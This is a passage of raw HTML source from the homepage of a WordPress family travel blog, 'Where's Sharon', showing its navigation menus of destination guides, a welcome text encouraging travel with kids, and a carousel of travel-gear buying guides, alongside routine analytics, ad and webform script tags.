settings.readyCallback(); } } ); } src = settings.source || {}; if ( src.concatemoji ) { addScript( src.concatemoji ); } else if ( src.wpemoji && src.twemoji ) { addScript( src.twemoji ); addScript( src.wpemoji ); } } } )( window, document, window._wpemojiSettings );</script> <link rel='stylesheet' id='custom_css-css' href='https://www.wheressharon.com/wp-content/themes/jupiter/templates/custom-css.php' type='text/css' media='all' /><link rel='stylesheet' id='google_fonts-css' href='https://fonts.googleapis.com/css?family=Amaranth%3A300%2C400%2C600&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Ccyrillic&#038;ver=4.9.10' type='text/css' media='all' /> <script type='text/javascript'>var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/www.wheressharon.com","hash_tracking":"false"};</script> <script type='text/javascript' async="async" data-noptimize="1" data-cfasync="false" src='//scripts.mediavine.com/tags/wheres-sharon-new-ownership.js'></script> <link rel='https://api.w.org/' href='https://www.wheressharon.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.wheressharon.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.wheressharon.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 4.9.10" /><link rel='shortlink' href='https://www.wheressharon.com/' /><link rel="alternate" type="application/json+oembed" href="https://www.wheressharon.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.wheressharon.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://www.wheressharon.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.wheressharon.com%2F&#038;format=xml" /> <script type="text/javascript">window._zem_rp_post_id = '10004'; window._zem_rp_thumbnails = true; window._zem_rp_post_title = 'Where%27s+Sharon%3F'; window._zem_rp_post_tags = []; window._zem_rp_static_base_url = 'https://content.zemanta.com/static/'; window._zem_rp_wp_ajax_url = 'https://www.wheressharon.com/wp-admin/admin-ajax.php'; window._zem_rp_plugin_version = '1.14'; window._zem_rp_num_rel_posts = '5';</script> <meta name="specificfeeds-verification-code-eksvSVhWQUI0NkRyR1lHaHhrM1RNeFl0a3VFdTEwT1RmQVNQbVFsM0VvQmRsc2Z0akhpNjdZdnNtQ0pVMk5hMkhqQXVHWG5zdmFGR2dudmZqbTExdUlxdmx1NGlyRktuc3FnckJCN0h4UytEYXJFVjVVUXpqQjQzdm5CZzIyU0l8ZitFUC9DQTBLVGxmVEdqVTlxMWIwWk0xd0J2TkxxL1VMdENRZDdudGJSVT0=" content="9yly1WmTMzdqvqD8jDgd"/></head><body class="home page-template-default page page-id-10004"> <input type="hidden" id="pp_ajax_search" name="pp_ajax_search" value=""/> <input type="hidden" id="pp_homepage_url" name="pp_homepage_url" value="https://www.wheressharon.com"/> <input type="hidden" id="pp_slider_auto" name="pp_slider_auto" value=""/> <input type="hidden" id="pp_slider_timer" name="pp_slider_timer" value="7"/><div class="mobile_menu_wrapper"><div class="menu-main-menu-container"><ul id="mobile_main_menu" class="mobile_main_nav"><li id="menu-item-10003" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10003"><a href="https://www.wheressharon.com/about-us/">About</a></li><li id="menu-item-10001" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10001"><a href="https://www.wheressharon.com/work-us/">Work With Us</a></li><li id="menu-item-14583" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14583"><a href="https://www.wheressharon.com/contact/">Contact</a></li><li id="menu-item-10902" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10902"><a href="https://www.wheressharon.com/privacy-policy/">Privacy</a></li><li id="menu-item-20612" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20612"><a href="https://www.wheressharon.com/disclaimer/">Disclaimer</a></li></ul></div><div class="menu-secondary-menu-container"><ul id="mobile_second_menu" class="mobile_main_nav"><li id="menu-item-21587" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-21587"><a href="https://www.wheressharon.com">Home</a></li><li id="menu-item-10432" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10432"><a href="https://www.wheressharon.com/start/">Start Here</a></li><li id="menu-item-10010" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-10010"><a href="https://www.wheressharon.com/family-travel/">Plan Family Travel</a><ul class="sub-menu"><li id="menu-item-13159" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13159"><a href="https://www.wheressharon.com/country/travel-tips/">Travel Tips</a></li><li id="menu-item-13197" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13197"><a href="https://www.wheressharon.com/country/accommodation/">Best Accommodation</a></li><li id="menu-item-12267" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12267"><a href="https://www.wheressharon.com/category/reviews/">Best Products</a></li><li id="menu-item-13163" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-13163"><a href="https://www.wheressharon.com/category/discussion/">Discussions</a></li></ul></li><li id="menu-item-13157" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-13157"><a href="https://www.wheressharon.com/destination-guides/">Destination Guides</a><ul class="sub-menu"><li id="menu-item-10117" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-10117"><a href="https://www.wheressharon.com/asia/">Asia</a><ul class="sub-menu"><li id="menu-item-13610" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13610"><a href="https://www.wheressharon.com/country/brunei/">Brunei</a></li><li id="menu-item-22784" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-22784"><a href="https://www.wheressharon.com/country/china-travel-blog/">China</a></li><li id="menu-item-17161" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17161"><a href="https://www.wheressharon.com/country/japan-travel-blog/">Japan</a></li><li id="menu-item-13180" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13180"><a href="https://www.wheressharon.com/country/indonesia-travel-blog/">Indonesia</a></li><li id="menu-item-22981" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-22981"><a href="https://www.wheressharon.com/country/maldives-travel-blog/">Maldives</a></li><li id="menu-item-13177" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13177"><a href="https://www.wheressharon.com/country/malaysia/">Malaysia</a></li><li id="menu-item-13422" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13422"><a href="https://www.wheressharon.com/country/myanmar-travel-blog/">Myanmar</a></li><li id="menu-item-20525" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-20525"><a href="https://www.wheressharon.com/asia-with-kids/top-things-to-do-in-muscat-oman/">Oman</a></li><li id="menu-item-13175" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13175"><a href="https://www.wheressharon.com/country/philippines/">Philippines</a></li><li id="menu-item-13178" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13178"><a href="https://www.wheressharon.com/country/singapore-travel-blog/">Singapore</a></li><li id="menu-item-14138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14138"><a href="https://www.wheressharon.com/country/sri-lanka-travel-blog/">Sri Lanka</a></li><li id="menu-item-13176" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13176"><a href="https://www.wheressharon.com/country/taiwan/">Taiwan</a></li><li id="menu-item-13179" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13179"><a href="https://www.wheressharon.com/country/thailand-travel-blog/">Thailand</a></li><li id="menu-item-20705" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20705"><a href="https://www.wheressharon.com/country/united-arab-emirates-travel-blog/">United Arab Emirates</a></li></ul></li><li id="menu-item-10119" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-10119"><a href="https://www.wheressharon.com/country/africa/">Africa</a><ul class="sub-menu"><li id="menu-item-23361" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-23361"><a href="https://www.wheressharon.com/africa-with-kids/best-places-to-visit-in-mauritius/">Mauritius</a></li><li id="menu-item-23362" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-23362"><a href="https://www.wheressharon.com/africa-with-kids/top-things-to-do-in-seychelles/">Seychelles</a></li><li id="menu-item-23390" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23390"><a href="https://www.wheressharon.com/country/south-africa-travel-blog/">South Africa</a></li></ul></li><li id="menu-item-10118" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-10118"><a href="https://www.wheressharon.com/europe/">Europe</a><ul class="sub-menu"><li id="menu-item-16368" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16368"><a href="https://www.wheressharon.com/country/croatia-travel-blog/">Croatia</a></li><li id="menu-item-15687" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15687"><a href="https://www.wheressharon.com/country/england-travel-blog/">England</a></li><li id="menu-item-15209" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15209"><a href="https://www.wheressharon.com/country/estonia-travel-blog/">Estonia</a></li><li id="menu-item-15088" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15088"><a href="https://www.wheressharon.com/country/finland-travel-blog/">Finland</a></li><li id="menu-item-15711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15711"><a href="https://www.wheressharon.com/country/france-travel-blog/">France</a></li><li id="menu-item-16025" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16025"><a href="https://www.wheressharon.com/country/italy-travel-blog/">Italy</a></li><li id="menu-item-15261" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15261"><a href="https://www.wheressharon.com/country/latvia-travel-blog/">Latvia</a></li><li id="menu-item-15342" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15342"><a href="https://www.wheressharon.com/country/lithuania-travel-blog/">Lithuania</a></li><li id="menu-item-16516" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16516"><a href="https://www.wheressharon.com/country/norway-travel-blog/">Norway</a></li><li id="menu-item-15568" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15568"><a href="https://www.wheressharon.com/country/poland-travel-blog/">Poland</a></li><li id="menu-item-19823" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-19823"><a href="https://www.wheressharon.com/europe-with-kids/top-10-things-to-do-in-belgrade-with-kids/">Serbia</a></li><li id="menu-item-16084" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16084"><a href="https://www.wheressharon.com/country/slovenia-travel-blog/">Slovenia</a></li><li id="menu-item-20578" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20578"><a href="https://www.wheressharon.com/country/spain-travel-blog/">Spain</a></li><li id="menu-item-14913" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14913"><a href="https://www.wheressharon.com/country/sweden-travel-blog/">Sweden</a></li></ul></li><li id="menu-item-10115" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-10115"><a href="https://www.wheressharon.com/north-america/">North America</a><ul class="sub-menu"><li id="menu-item-13184" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13184"><a href="https://www.wheressharon.com/family-trip-usa-caribbean/caribbean-cruise/caribbean-cruise-things-to-do-in-antigua/">Antigua</a></li><li id="menu-item-13185" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13185"><a href="https://www.wheressharon.com/family-trip-usa-caribbean/caribbean-cruise/caribbean-cruise-exploring-cruise-port-nassau-bahamas/">Bahamas</a></li><li id="menu-item-13182" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13182"><a href="https://www.wheressharon.com/country/dominican-republic-travel-blog/">Dominican Republic</a></li><li id="menu-item-13181" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13181"><a href="https://www.wheressharon.com/country/usa-travel-blog/">USA</a></li><li id="menu-item-13183" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13183"><a href="https://www.wheressharon.com/family-trip-usa-caribbean/caribbean-cruise/things-to-do-in-the-us-virgin-islands/">US Virgin Islands</a></li></ul></li><li id="menu-item-13158" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-13158"><a href="https://www.wheressharon.com/oceania/">Oceania</a><ul class="sub-menu"><li id="menu-item-13186" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13186"><a href="https://www.wheressharon.com/country/australia/">Australia</a></li><li id="menu-item-21590" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21590"><a href="https://www.wheressharon.com/country/fiji-travel-blog/">Fiji</a></li><li id="menu-item-20043" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20043"><a href="https://www.wheressharon.com/country/new-zealand-travel-blog/">New Zealand</a></li></ul></li><li id="menu-item-10116" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10116"><a href="https://www.wheressharon.com/country/south-america/">South America</a></li></ul></li><li id="menu-item-13169" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13169"><a title="Family Travel Blog" href="https://www.wheressharon.com/family-travel-blog-2/">Blog</a></li></ul></div></div><div id="wrapper"><div id="header_wrapper"><div class="standard_wrapper"><div id="mobile_nav_icon"></div><div class="menu-main-menu-container"><ul id="main_menu" class="main_nav"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10003"><a href="https://www.wheressharon.com/about-us/">About</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10001"><a href="https://www.wheressharon.com/work-us/">Work With Us</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14583"><a href="https://www.wheressharon.com/contact/">Contact</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10902"><a href="https://www.wheressharon.com/privacy-policy/">Privacy</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20612"><a href="https://www.wheressharon.com/disclaimer/">Disclaimer</a></li></ul></div><div id="menu_border_wrapper"></div><form role="search" method="get" name="searchform" id="searchform" action="https://www.wheressharon.com/"><div> <input type="text" value="" name="s" id="s" autocomplete="off" title="Search..."/> <button type="submit"> <img src="https://www.wheressharon.com/wp-content/themes/jupiter/images/search_form_icon.png" alt=""/> </button></div><div id="autocomplete"></div></form><div class="social_wrapper"><ul><li class="facebook"><a target="_blank" title="Facebook" href="http://facebook.com/wheressharonandfamily"><img src="https://www.wheressharon.com/wp-content/themes/jupiter/images/social_black/facebook.png" alt=""/></a></li><li class="twitter"><a target="_blank" title="Twitter" href="http://twitter.com/wheressharon"><img src="https://www.wheressharon.com/wp-content/themes/jupiter/images/social_black/twitter.png" alt=""/></a></li><li class="pinterest"><a target="_blank" title="Pinterest" href="http://pinterest.com/whereissharon"><img src="https://www.wheressharon.com/wp-content/themes/jupiter/images/social_black/pinterest.png" alt=""/></a></li><li class="instagram"><a target="_blank" title="Instagram" href="http://instagram.com/wheressharon"><img src="https://www.wheressharon.com/wp-content/themes/jupiter/images/social_black/instagram.png" alt=""/></a></li></ul></div></div></div><div class="header_ads fade-in animated1"></div><div id="boxed_wrapper"><div class="logo fade-in animated1"> <a id="custom_logo" class="logo_wrapper" href="https://www.wheressharon.com"> <img src="https://www.wheressharon.com/wp-content/uploads/2017/02/wheres_sharon_family_travel_blog-banner.jpg" alt=""/> </a></div><div class="menu-secondary-menu-container"><ul id="second_menu" class="second_nav fade-in animated1"><li id="menu-item-21587" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home"><a href="https://www.wheressharon.com">Home</a></li><li id="menu-item-10432" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.wheressharon.com/start/">Start Here</a></li><li id="menu-item-10010" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><a href="https://www.wheressharon.com/family-travel/">Plan Family Travel</a><ul class="sub-menu"><li id="menu-item-13159" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/travel-tips/">Travel Tips</a></li><li id="menu-item-13197" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/accommodation/">Best Accommodation</a></li><li id="menu-item-12267" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://www.wheressharon.com/category/reviews/">Best Products</a></li><li id="menu-item-13163" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://www.wheressharon.com/category/discussion/">Discussions</a></li></ul></li><li id="menu-item-13157" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><a href="https://www.wheressharon.com/destination-guides/">Destination Guides</a><ul class="sub-menu"><li id="menu-item-10117" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="https://www.wheressharon.com/asia/">Asia</a><ul class="sub-menu"><li id="menu-item-13610" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/brunei/">Brunei</a></li><li id="menu-item-22784" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/china-travel-blog/">China</a></li><li id="menu-item-17161" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/japan-travel-blog/">Japan</a></li><li id="menu-item-13180" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/indonesia-travel-blog/">Indonesia</a></li><li id="menu-item-22981" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/maldives-travel-blog/">Maldives</a></li><li id="menu-item-13177" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/malaysia/">Malaysia</a></li><li id="menu-item-13422" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/myanmar-travel-blog/">Myanmar</a></li><li id="menu-item-20525" class="menu-item menu-item-type-post_type menu-item-object-post"><a href="https://www.wheressharon.com/asia-with-kids/top-things-to-do-in-muscat-oman/">Oman</a></li><li id="menu-item-13175" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/philippines/">Philippines</a></li><li id="menu-item-13178" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/singapore-travel-blog/">Singapore</a></li><li id="menu-item-14138" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/sri-lanka-travel-blog/">Sri Lanka</a></li><li id="menu-item-13176" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/taiwan/">Taiwan</a></li><li id="menu-item-13179" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/thailand-travel-blog/">Thailand</a></li><li id="menu-item-20705" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/united-arab-emirates-travel-blog/">United Arab Emirates</a></li></ul></li><li id="menu-item-10119" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="https://www.wheressharon.com/country/africa/">Africa</a><ul class="sub-menu"><li id="menu-item-23361" class="menu-item menu-item-type-post_type menu-item-object-post"><a href="https://www.wheressharon.com/africa-with-kids/best-places-to-visit-in-mauritius/">Mauritius</a></li><li id="menu-item-23362" class="menu-item menu-item-type-post_type menu-item-object-post"><a href="https://www.wheressharon.com/africa-with-kids/top-things-to-do-in-seychelles/">Seychelles</a></li><li id="menu-item-23390" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/south-africa-travel-blog/">South Africa</a></li></ul></li><li id="menu-item-10118" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="https://www.wheressharon.com/europe/">Europe</a><ul class="sub-menu"><li id="menu-item-16368" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/croatia-travel-blog/">Croatia</a></li><li id="menu-item-15687" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/england-travel-blog/">England</a></li><li id="menu-item-15209" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/estonia-travel-blog/">Estonia</a></li><li id="menu-item-15088" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/finland-travel-blog/">Finland</a></li><li id="menu-item-15711" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/france-travel-blog/">France</a></li><li id="menu-item-16025" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/italy-travel-blog/">Italy</a></li><li id="menu-item-15261" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/latvia-travel-blog/">Latvia</a></li><li id="menu-item-15342" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/lithuania-travel-blog/">Lithuania</a></li><li id="menu-item-16516" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/norway-travel-blog/">Norway</a></li><li id="menu-item-15568" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/poland-travel-blog/">Poland</a></li><li id="menu-item-19823" class="menu-item menu-item-type-post_type menu-item-object-post"><a href="https://www.wheressharon.com/europe-with-kids/top-10-things-to-do-in-belgrade-with-kids/">Serbia</a></li><li id="menu-item-16084" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/slovenia-travel-blog/">Slovenia</a></li><li id="menu-item-20578" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/spain-travel-blog/">Spain</a></li><li id="menu-item-14913" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/sweden-travel-blog/">Sweden</a></li></ul></li><li id="menu-item-10115" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="https://www.wheressharon.com/north-america/">North America</a><ul class="sub-menu"><li id="menu-item-13184" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/family-trip-usa-caribbean/caribbean-cruise/caribbean-cruise-things-to-do-in-antigua/">Antigua</a></li><li id="menu-item-13185" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/family-trip-usa-caribbean/caribbean-cruise/caribbean-cruise-exploring-cruise-port-nassau-bahamas/">Bahamas</a></li><li id="menu-item-13182" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/dominican-republic-travel-blog/">Dominican Republic</a></li><li id="menu-item-13181" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/usa-travel-blog/">USA</a></li><li id="menu-item-13183" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/family-trip-usa-caribbean/caribbean-cruise/things-to-do-in-the-us-virgin-islands/">US Virgin Islands</a></li></ul></li><li id="menu-item-13158" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="https://www.wheressharon.com/oceania/">Oceania</a><ul class="sub-menu"><li id="menu-item-13186" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/australia/">Australia</a></li><li id="menu-item-21590" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/fiji-travel-blog/">Fiji</a></li><li id="menu-item-20043" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/new-zealand-travel-blog/">New Zealand</a></li></ul></li><li id="menu-item-10116" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.wheressharon.com/country/south-america/">South America</a></li></ul></li><li id="menu-item-13169" class="menu-item menu-item-type-post_type menu-item-object-page"><a title="Family Travel Blog" href="https://www.wheressharon.com/family-travel-blog-2/">Blog</a></li></ul></div></div> <br class="clear"/><div id="content_wrapper"><div class="inner fade-in animated4"><div class="inner_wrapper fullwidth"></div></div><div class="one withpadding"><a href="https://www.wheressharon.com/about-us/" target="_blank"><img src="https://www.wheressharon.com/wp-content/uploads/2014/04/Let-Us-Show-You-How-To-Travel-With-Kids.png" class="aligncenter size-large wp-image-20417"></a><br /></p><h5 class="header_line post_fullwidth"><span>Is It Crazy To Travel With Kids?</span></h5><p></p><div class="welcome-entry"><p style="margin-bottom:20px;margin-top:6px;font-size: 20px;line-height: 30px;">NO! Here at <i>Where&#8217;s Sharon</i> we believe that <b>travelling with kids is not only lots of fun but incredibly beneficial for families</b>.</p><p style="margin-bottom:20px;margin-top:6px;font-size: 20px;line-height: 30px;">It can be stressful planning a trip with kids &#8211; we are here to help! <i>Where&#8217;s Sharon</i> is the top family travel resource to help you plan the best trip possible for you and your kids.</p><h5 class="header_line post_fullwidth"><span>Start Planning Now!</span></h5><p> <a alt="Start Here" target="_blank" href="https://www.wheressharon.com/start/"><img src="https://www.wheressharon.com/wp-content/uploads/2014/04/start-here.png" width="332" height="124"></a>   <a href="https://www.wheressharon.com/destination-guides/" target="_blank"><img src="https://www.wheressharon.com/wp-content/uploads/2016/11/destination-guides-1.png"></a> <a href="#" class="manual-optin-trigger" data-optin-slug="jgplyrdrtcne9jqe"><img src="https://www.wheressharon.com/wp-content/uploads/2016/11/FOLLOW-our-adventures-1.png"></a></p><p style="margin-bottom:20px;margin-top:6px;font-size: 20px;line-height: 30px;"><i>On this site, you will find information to help you decide <a href="https://www.wheressharon.com/planning-family-travel/best-family-holiday-destinations/" target="_blank">where to go</a>, detailed <a href="https://www.wheressharon.com/destination-guides/" target="_blank">destination guides</a> with the best attractions and places to stay, <a href="https://www.wheressharon.com/planning-family-travel/packing-for-europe-in-summer-carry-on-only-packing-list/" target="_blank">packing lists</a> and <a href="https://www.wheressharon.com/reviews/" target="_blank">buying guides</a> for the best gear. We want to help you travel smarter, cheaper and better with kids!</i></p><p style="margin-bottom:0px;margin-top:6px;font-size: 20px;line-height: 30px;"><b>We know all of this because we travel extensively with our own three, young kids </b> and also have many other guest writers who are travel experts as well. Keep reading and plan your next trip!</p></div></div><div class="one withpadding"><script type="text/javascript" src="https://app.getresponse.com/view_webform_v2.js?u=Holy&#038;webforms_id=4711201"></script></div><div class="one withpadding"><h5 class="header_line post_fullwidth"><span>Family Destination Guides</span></h5><p><a href="https://www.wheressharon.com/country/asia/"><img src="https://www.wheressharon.com/wp-content/uploads/2015/03/Oceania-1.png"></a>    <a href="https://www.wheressharon.com/country/north-america/"><img src="https://www.wheressharon.com/wp-content/uploads/2015/03/north-america.png"></a>    <a href="https://www.wheressharon.com/country/oceania/"><img src="https://www.wheressharon.com/wp-content/uploads/2015/03/Oceania.png"></a>    <a href="https://www.wheressharon.com/country/europe/"><img src="https://www.wheressharon.com/wp-content/uploads/2015/03/europe.png"></a>    <a href="https://www.wheressharon.com/country/south-america/"><img src="https://www.wheressharon.com/wp-content/uploads/2015/03/south-america.png"></a></div><div class="one withpadding"><h5 class="header_line post_fullwidth"><span>Planning Family Travel</span></h5><p><a href="https://www.wheressharon.com/country/travel-tips/"><img src="https://www.wheressharon.com/wp-content/uploads/2016/11/TRAVEL-TIPS-1.png"></a>  <a href="https://www.wheressharon.com/country/accommodation/"><img src="https://www.wheressharon.com/wp-content/uploads/2015/07/DESTINATIONS.png"></a>  <a href="https://www.wheressharon.com/reviews/"><img src="https://www.wheressharon.com/wp-content/uploads/2016/11/BEST-TRAVEL-products-1.png"></a></div><div class="one withpadding"><a href="https://www.wheressharon.com/discussion/how-to-start-a-travel-blog/" rel="nofollow" target="_blank"><img style="display: block;margin-left: auto; margin-right: auto;" src="https://www.wheressharon.com/wp-content/uploads/2015/07/How-to-start-a-travel-blog-1.png" /></a></div> <input type="hidden" id="post_carousel_column" name="post_carousel_column" value="5"/><div class="one"><div class="ppb_header fullwidth"><h5 class="header_line post_fullwidth"><span>What To Take?</span></h5></div><div class="flexslider entry_img post_carousel post_fullwidth"><ul class="slides"><li><a href="https://www.wheressharon.com/x-featured-discussions/our-guide-to-the-best-baby-carrier-and-reviews-2015/" title="Our Guide to the Best Baby Carrier and Reviews 2018"><img class="carousel_thumb" src="https://www.wheressharon.com/wp-content/uploads/2015/04/Our-guideto-the-best-baby-carriers-190x140.png" alt="Our Guide to the Best Baby Carrier and Reviews 2018" style="width:165px;height:auto;"/></a><h7><a href="https://www.wheressharon.com/x-featured-discussions/our-guide-to-the-best-baby-carrier-and-reviews-2015/">Our Guide to the Best Baby Carrier and Reviews 2018</a></h7><br/><span class="post_attribute">Jan 08, 2018</span></li><li><a href="https://www.wheressharon.com/x-featured-discussions/best-travel-car-seats-best-travel-booster-seats/" title="Guide to the Best Travel Car Seats and Best Travel Booster Seats 2018"><img class="carousel_thumb" src="https://www.wheressharon.com/wp-content/uploads/2015/05/Choosing-the-best-travel-car-seat-and-booster-190x140.png" alt="Our Guide to the Best Baby Carrier and Reviews 2018" style="width:165px;height:auto;"/></a><h7><a href="https://www.wheressharon.com/x-featured-discussions/best-travel-car-seats-best-travel-booster-seats/">Guide to the Best Travel Car Seats and Best Travel Booster Seats 2018</a></h7><br/><span class="post_attribute">Jan 07, 2018</span></li><li><a href="https://www.wheressharon.com/x-featured-discussions/best-luggage-reviews/" title="Reviews of the Best Luggage 2018"><img class="carousel_thumb" src="https://www.wheressharon.com/wp-content/uploads/2015/11/lotsofluggage-190x140.jpg" alt="Our Guide to the Best Baby Carrier and Reviews 2018" style="width:165px;height:auto;"/></a><h7><a href="https://www.wheressharon.com/x-featured-discussions/best-luggage-reviews/">Reviews of the Best Luggage 2018</a></h7><br/><span class="post_attribute">Jan 07, 2018</span></li><li><a href="https://www.wheressharon.com/x-featured-discussions/guide-best-travel-stroller/" title="Our Guide to choosing the Best Travel Stroller 2018"><img class="carousel_thumb" src="https://www.wheressharon.com/wp-content/uploads/2014/12/Our-Guide-to-buying-the-best-travel-stroller-190x140.png" alt="Our Guide to the Best Baby Carrier and Reviews 2018" style="width:165px;height:auto;"/></a><h7><a 